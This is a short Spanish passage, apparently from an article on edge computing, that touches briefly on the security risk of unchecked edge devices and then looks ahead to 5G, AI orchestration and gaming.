Como el objetivo que nos propusimos era lograr una mayor velocidad de comunicación, es conveniente olvidar que necesitamos verificar qué sale y qué vuelve a entrar. Pero descuidar estas verificaciones podría convertir los dispositivos en el borde en puertas abiertas hacia su infraestructura . En el lado positivo, en la computación de borde, los dispositivos en el perímetro solo obtienen lo que necesitan por diseño, y eso limita la posibilidad de que cualquier actor de amenazas recupere un conjunto completo de datos de un dispositivo.

El futuro de la informática de punta

Con 5G en el horizonte e inteligencia artificial lista para orquestar recursos, vemos un futuro brillante para la informática de vanguardia. Los tiempos de latencia incluso podrían ser lo suficientemente adecuados como para conquistar la industria del juego. Al mirar la pila de plástico en mi armario, se me ocurre que esto también será mejor para el planeta.